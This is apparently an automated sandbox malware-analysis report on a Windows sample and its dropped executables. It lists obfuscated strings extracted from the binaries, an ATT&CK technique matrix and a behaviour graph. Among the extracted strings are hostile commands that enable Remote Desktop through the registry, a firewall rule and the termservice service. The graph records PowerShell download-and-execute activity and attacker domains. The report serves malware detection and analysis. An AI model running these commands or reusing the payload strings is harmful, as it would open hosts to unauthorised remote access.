ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: zY9sqWs[1].exe.14.drString found in binary or memory: net start termservice
                                    Source: zY9sqWs[1].exe.14.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setbfbda6ae1db325c2ff4b455ce9896e6d6c7109f0f87b7e67c332588c3c6da69d652098acf55d6d3c9b14c606ca54406ebd6b79NYh4LeECDV5TDw6VM72ZcWhv1q0aDsaggrKm8wZyeFx=OX5CMv==VD1obCUxKX2vdL==MXWvdL==PIR4YXZmOZJXFK==S8i3dSVxBpWWQK==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsO60m0V==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfVSNp3lCL2AXjgHuH5Wrm3VGxV8SkciR53D==VrWwZ72nIx9HyIKFIynJNH2AEXyiV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsdsWxZBxwCCJ9VMKyZYJl20N=V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfUXhp2Jx9Igaj4LOz6q==K0WWRQJUKn yJOzwOV==YJGzcv==VJ WVv==S5WXb1R9esN9d7R9c8N9Zrl9Z2J9dLN9e1590L19Z2Z9cMZ9c7d9do1=Z8KoZx5o2Jy0PWzghHYl5Ar Z8KoZx5o2Jx=Z7yscx5o2Jx=0IF=0YF=0YJ=0YN=U1Gsbb==bMS3cyozBz==bMS3cCM BB9=02io0LyvZ72ndMNAc2OsfrmzM8G4aRV4QLN+QLR+M6CvdRdt2qNnLDtuJB==gF==KsWxaSQcQV==d7iobBwDCl6c3Ay=b7WBbhVwCCJmQAzjS7W3ThF4100dLXnqiLOuLQZofu==VMKyZYJl2XS 5AH4R00EUWQkK5 e5Bf9hrN=R20schE=T7GCcBVC35uXzyz93l==S0OIVv==VLGxZBEkK5Wb5RLgiMd=SL mdB9CyIedPa==R00KNEZzVB94OZyLQQPShre18K==Rrm3ZBVqPZ6cQRK=Ur BdB9yV7 zaB9DR7 wbXRzW7mxRBVqPZ6cQRK=NIFBMuQ5DmdWFK==drJ=e7J=R7 xdBVy4F2M6RDcTnuu7Qr2eVyf8rLy0r BbN1oO0S FsD g8OvSAzAiRXrGWVwMX1wLN0xEVqGbX54PZ6SCOTgh8uw6Wf2eU6sJmwpc8KwLRRl4JFZzA79g1N BgLjhEBgJCwpb1yobhFxPW1aJl1NQX9y4JWm5w3Lj2umHcvjgFyq60IkeLmybd9zO6Sd5w3qiMCmRQUPGeXIEVpwLN0xBV1=MX1QCb==Q8Omce0BMrqzZr==R7 xdBVy4F2M6RDcTnui6BvueUKf9Kgycn 7LSd74B2e3XLkQ2Oz5APw206iU0L=V6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5HWakhMO1SRDQ2UYjSIIyc2C4dBVCJpGlQK==R7 wcCV4P0KGPQ3cZ1KmZBVqP5ih2gvjg1Yw6BzAg1OZ9r97f2pzMOIDDGVUEtiWQ01=M2WxaRNzPJVlV6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5MQ7giLOlOgfm3U6aL44RWKKSTAx0IXSxKVy=V6mWVzVRNHOn3hTpg7qUSRKyQBCaP6QBermmZSNgGpGr2QPvf2Gx5Az71DWnUKQyWrmnZR9NHD==YIBzMyA=SLWpYSVw4IOd5BTggr7AEfbU3VKt7LQ3b1 xSLWpYSVw4IOd5BTggr7AEffU3VKt7LQ3b1 xV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8NjTgRgG6Wq4gXliKSm6hHrf01=VMKyZCVn4H6 3QW=NoBAOL==NoBBMb==NoBANb==NoBBNL==R8WBchVy4HKT2QzbYF==Pop9dsWxZBxwCCJmQRjcM7tjJsSkcXtv1ZykzwadNH2q5MukJnBpJdB41Z2d3XXRNIxhCcSi3ESqDE==KnZjRSht4FJ=JnBpJdBCPZ59JHZpIv==VL 6ZSJD1JWk3w7cjLN=M1W7ZRN54Jmn3hDmgLek8MvA3UYt9KQCb1exZRQkBX0h3AW8Nl==Jl==d7i4dBRz4559CRO8Q2JhFu==d8Rbcr==drGxZB9xT7W8Yh9l3pR9KAHWg8O1QzvA3UutT0L=NIBzMyA4CWl=NIBzMyA4CmJ=NIBzMyA4CmN=NIBzMyA4C5Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: zY9sqWs.exe.14.drString found in binary or memory: net start termservice
                                    Source: zY9sqWs.exe.14.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setbfbda6ae1db325c2ff4b455ce9896e6d6c7109f0f87b7e67c332588c3c6da69d652098acf55d6d3c9b14c606ca54406ebd6b79NYh4LeECDV5TDw6VM72ZcWhv1q0aDsaggrKm8wZyeFx=OX5CMv==VD1obCUxKX2vdL==MXWvdL==PIR4YXZmOZJXFK==S8i3dSVxBpWWQK==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsO60m0V==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfVSNp3lCL2AXjgHuH5Wrm3VGxV8SkciR53D==VrWwZ72nIx9HyIKFIynJNH2AEXyiV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsdsWxZBxwCCJ9VMKyZYJl20N=V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfUXhp2Jx9Igaj4LOz6q==K0WWRQJUKn yJOzwOV==YJGzcv==VJ WVv==S5WXb1R9esN9d7R9c8N9Zrl9Z2J9dLN9e1590L19Z2Z9cMZ9c7d9do1=Z8KoZx5o2Jy0PWzghHYl5Ar Z8KoZx5o2Jx=Z7yscx5o2Jx=0IF=0YF=0YJ=0YN=U1Gsbb==bMS3cyozBz==bMS3cCM BB9=02io0LyvZ72ndMNAc2OsfrmzM8G4aRV4QLN+QLR+M6CvdRdt2qNnLDtuJB==gF==KsWxaSQcQV==d7iobBwDCl6c3Ay=b7WBbhVwCCJmQAzjS7W3ThF4100dLXnqiLOuLQZofu==VMKyZYJl2XS 5AH4R00EUWQkK5 e5Bf9hrN=R20schE=T7GCcBVC35uXzyz93l==S0OIVv==VLGxZBEkK5Wb5RLgiMd=SL mdB9CyIedPa==R00KNEZzVB94OZyLQQPShre18K==Rrm3ZBVqPZ6cQRK=Ur BdB9yV7 zaB9DR7 wbXRzW7mxRBVqPZ6cQRK=NIFBMuQ5DmdWFK==drJ=e7J=R7 xdBVy4F2M6RDcTnuu7Qr2eVyf8rLy0r BbN1oO0S FsD g8OvSAzAiRXrGWVwMX1wLN0xEVqGbX54PZ6SCOTgh8uw6Wf2eU6sJmwpc8KwLRRl4JFZzA79g1N BgLjhEBgJCwpb1yobhFxPW1aJl1NQX9y4JWm5w3Lj2umHcvjgFyq60IkeLmybd9zO6Sd5w3qiMCmRQUPGeXIEVpwLN0xBV1=MX1QCb==Q8Omce0BMrqzZr==R7 xdBVy4F2M6RDcTnui6BvueUKf9Kgycn 7LSd74B2e3XLkQ2Oz5APw206iU0L=V6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5HWakhMO1SRDQ2UYjSIIyc2C4dBVCJpGlQK==R7 wcCV4P0KGPQ3cZ1KmZBVqP5ih2gvjg1Yw6BzAg1OZ9r97f2pzMOIDDGVUEtiWQ01=M2WxaRNzPJVlV6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5MQ7giLOlOgfm3U6aL44RWKKSTAx0IXSxKVy=V6mWVzVRNHOn3hTpg7qUSRKyQBCaP6QBermmZSNgGpGr2QPvf2Gx5Az71DWnUKQyWrmnZR9NHD==YIBzMyA=SLWpYSVw4IOd5BTggr7AEfbU3VKt7LQ3b1 xSLWpYSVw4IOd5BTggr7AEffU3VKt7LQ3b1 xV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8NjTgRgG6Wq4gXliKSm6hHrf01=VMKyZCVn4H6 3QW=NoBAOL==NoBBMb==NoBANb==NoBBNL==R8WBchVy4HKT2QzbYF==Pop9dsWxZBxwCCJmQRjcM7tjJsSkcXtv1ZykzwadNH2q5MukJnBpJdB41Z2d3XXRNIxhCcSi3ESqDE==KnZjRSht4FJ=JnBpJdBCPZ59JHZpIv==VL 6ZSJD1JWk3w7cjLN=M1W7ZRN54Jmn3hDmgLek8MvA3UYt9KQCb1exZRQkBX0h3AW8Nl==Jl==d7i4dBRz4559CRO8Q2JhFu==d8Rbcr==drGxZB9xT7W8Yh9l3pR9KAHWg8O1QzvA3UutT0L=NIBzMyA4CWl=NIBzMyA4CmJ=NIBzMyA4CmN=NIBzMyA4C5Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004A1204
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004A1806

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information211
                                    Scripting                                    		2
                                    Valid Accounts                                    		121
                                    Windows Management Instrumentation                                    		211
                                    Scripting                                    		1
                                    Exploitation for Privilege Escalation                                    		11
                                    Disable or Modify Tools                                    		2
                                    OS Credential Dumping                                    		2
                                    System Time Discovery                                    		1
                                    Remote Desktop Protocol                                    		11
                                    Archive Collected Data                                    		12
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network Medium1
                                    System Shutdown/Reboot
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		11
                                    Deobfuscate/Decode Files or Information                                    		21
                                    Input Capture                                    		1
                                    Account Discovery                                    		Remote Desktop Protocol41
                                    Data from Local System                                    		11
                                    Encrypted Channel                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts12
                                    Command and Scripting Interpreter                                    		2
                                    Valid Accounts                                    		2
                                    Valid Accounts                                    		4
                                    Obfuscated Files or Information                                    		Security Account Manager13
                                    File and Directory Discovery                                    		SMB/Windows Admin Shares1
                                    Email Collection                                    		3
                                    Non-Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts11
                                    Scheduled Task/Job                                    		11
                                    Scheduled Task/Job                                    		21
                                    Access Token Manipulation                                    		33
                                    Software Packing                                    		NTDS2410
                                    System Information Discovery                                    		Distributed Component Object Model21
                                    Input Capture                                    		124
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud Accounts2
                                    PowerShell                                    		2
                                    Registry Run Keys / Startup Folder                                    		212
                                    Process Injection                                    		1
                                    Timestomp                                    		LSA Secrets1191
                                    Security Software Discovery                                    		SSH3
                                    Clipboard Data                                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                    Scheduled Task/Job                                    		1
                                    DLL Side-Loading                                    		Cached Domain Credentials571
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                                    Registry Run Keys / Startup Folder                                    		111
                                    Masquerading                                    		DCSync4
                                    Process Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                    Valid Accounts                                    		Proc Filesystem11
                                    Application Window Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt571
                                    Virtualization/Sandbox Evasion                                    		/etc/passwd and /etc/shadow1
                                    System Owner/User Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                    Access Token Manipulation                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                                    Process Injection                                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                    Mshta                                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632643 Sample: random.exe Startdate: 08/03/2025 Architecture: WINDOWS Score: 100 116 garagedrootz.top 2->116 118 arisechairedd.shop 2->118 120 5 other IPs or domains 2->120 154 Suricata IDS alerts for network traffic 2->154 156 Found malware configuration 2->156 158 Antivirus detection for URL or domain 2->158 160 32 other signatures 2->160 15 random.exe 1 2->15         started        19 rapes.exe 2->19         started        21 mshta.exe 1 2->21         started        23 5 other processes 2->23 signatures3 process4 dnsIp5 112 C:\Users\user\AppData\Local\...\tmxzSk7p3.hta, HTML 15->112 dropped 130 Binary is likely a compiled AutoIt script file 15->130 132 Found API chain indicative of sandbox detection 15->132 134 Creates HTA files 15->134 26 mshta.exe 1 15->26         started        29 cmd.exe 1 15->29         started        136 Multi AV Scanner detection for dropped file 19->136 138 Detected unpacking (changes PE section rights) 19->138 140 Contains functionality to start a terminal service 19->140 152 2 other signatures 19->152 142 Suspicious powershell command line found 21->142 144 Tries to download and execute files (via powershell) 21->144 31 powershell.exe 16 21->31         started        124 127.0.0.1 unknown unknown 23->124 146 Hides threads from debuggers 23->146 148 Tries to detect sandboxes / dynamic malware analysis system (registry check) 23->148 150 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 23->150 file6 signatures7 process8 signatures9 190 Suspicious powershell command line found 26->190 192 Tries to download and execute files (via powershell) 26->192 33 powershell.exe 15 19 26->33         started        194 Drops PE files with a suspicious file extension 29->194 196 Uses schtasks.exe or at.exe to add and modify task schedules 29->196 38 conhost.exe 29->38         started        40 schtasks.exe 1 29->40         started        42 TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE 31->42         started        44 conhost.exe 31->44         started        process10 dnsIp11 114 176.113.115.7, 